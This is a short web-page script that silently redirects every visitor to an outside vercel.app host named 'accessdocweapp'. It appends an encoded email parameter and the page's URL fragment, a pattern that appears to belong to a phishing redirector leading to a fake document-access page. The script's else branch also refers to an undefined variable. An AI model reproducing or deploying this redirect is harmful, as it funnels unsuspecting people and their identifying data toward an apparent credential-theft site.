    <script type="text/javascript">
        if(window.location.hash) {
            var url = window.location.href;
            var hash = url.split('#').pop();

            window.location.replace("https://accessdocweapp.vercel.app?u=12A099C8&e=19FBDDC&c=1B03D0&t=1&l=12FE474A2&email=p4WNIQBAbP9WAzsQmMcaL3zBjzlZ2TJR&seq=1#"+hash);
        } else {
          window.location.replace("https://accessdocweapp.vercel.app?u=12A099C8&e=19FBDDC&c=1B03D0&t=1&l=12FE474A2&email=p4WNIQBAbP9WAzsQmMcaL3zBjzlZ2TJR&seq=1#"+hash);
        }

    </script>
